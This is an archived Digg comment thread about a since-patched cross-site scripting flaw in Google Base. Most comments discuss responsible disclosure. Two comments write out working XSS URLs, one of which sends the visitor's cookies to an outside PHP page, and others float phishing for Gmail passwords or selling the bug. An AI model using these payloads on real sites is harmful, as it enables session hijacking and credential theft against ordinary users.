What is Digg?Sponsored by Dragon Age: Origins
Can't get enough Dragon Age: Origins? Play the flash game. view!
DragonAgeJourneys.com - Play the free companion flash game to Dragon Age: Origins.
14 Comments
- Ghozt64, on 10/12/2007, -0/+9http://base.google.com/base/s2?a_n0=%3Cscript%3Ealert(document.cookie)%3C/script%3E&a_y0=9&hl=en&gl=US
Excuse me sir, may I please "borrow your Google cookie data"? - inactive, on 10/12/2007, -3/+12It's good that this guy exercised responsible disclosure having given Google time to deal with the issue, kudos also to Google for dealing with it so quickly...I wish more vendors (ahem lookin' at you Microsoft) were so responsive.
- ozziek, on 10/12/2007, -1/+6Mmm, usually do MS get the chance? It seems people would rather exploit the issue or brag about it and not give MS the chance to do anything themselves.
- Fascist, on 10/12/2007, -0/+5I look at hot topics in the upcoming stories list, find out that there's a security hole in Google software, and find out it was already patched up.
Damn, that was fast. - inactive, on 10/12/2007, -0/+4Nice find on his part, besides the cookie reading - he could have just recreated a gmail login and since the domain is coming from *.Google.com there would be many gullible users that would naively given up their passwords.
- kalleanka, on 10/12/2007, -0/+2Damn, and it's still not fixed!
By the time I was 15 years old I knew one need to validate these kind of stuff. It's embarrassing that Google today suffers from these kind of stuff. - inactive, on 10/12/2007, -0/+1holy *****, something like this could be written (proofofconcept.php displays whatever omg is passed to it).
so basically if you get it to redirect to http://h1.ripway.com/jetski/proofofconcept.php?omg= {document.cookie} then you could save the contents of the cookies
Something like this should work:
http://base.google.com/base/s2?a_n0=%3Cscript%3Edocument.location='http://h1.ripway.com/jetski/proofofconcept.php?omg=' & document.cookie;%3C/script%3E&a_y0=9&hl=en&gl=US - vermin, on 10/12/2007, -0/+1Well it's nice to know that Google used common sense, fixed the problem, and thanked the people who found out about it and reported it. Some other companies would have ignored the problem and focused on getting the people arrested for "hacking".
- rouslan, on 10/12/2007, -0/+1Why the ***** did you report this to google!??
Are you crazy or something...You could have sold this information to hackers. - Ghozt64, on 10/12/2007, -0/+1Why the ***** are you such a script kiddie!??
Are you crazy or something? Some people believe in full disclosure instead of being malicious. - spravin, on 10/12/2007, -0/+1The scary thing about such attacks is that since they are web-based, all OSes/platforms are affected. Also since the hole is in the webserver, all browsers are affected. Normally whenever I would read about a new Windows/IE/Office security hole, I'd just silently chuckle in mirth, coz I knew as long as I'm on Linux, I'm not affected. Now that the web is replacing the OS as the universal platform, Linux users are as much vulnerable.
- roromx, on 10/12/2007, -0/+0Related: http://digg.com/security/Blogspot_hijacked
I still see some blogs with this problem - rebotfc, on 10/12/2007, -1/+1good article
- H011yJ3susB411s, on 10/12/2007, -6/+1Pasirodo ir lietuviu yra digg'e :)
smagu matyti :)
The Digg Toolbar for Firefox lets you Digg, submit content, and keep track of Digg even when you're not on the Digg site. Download the official 
© Digg Inc. 2009
— Content created and posted by Digg users is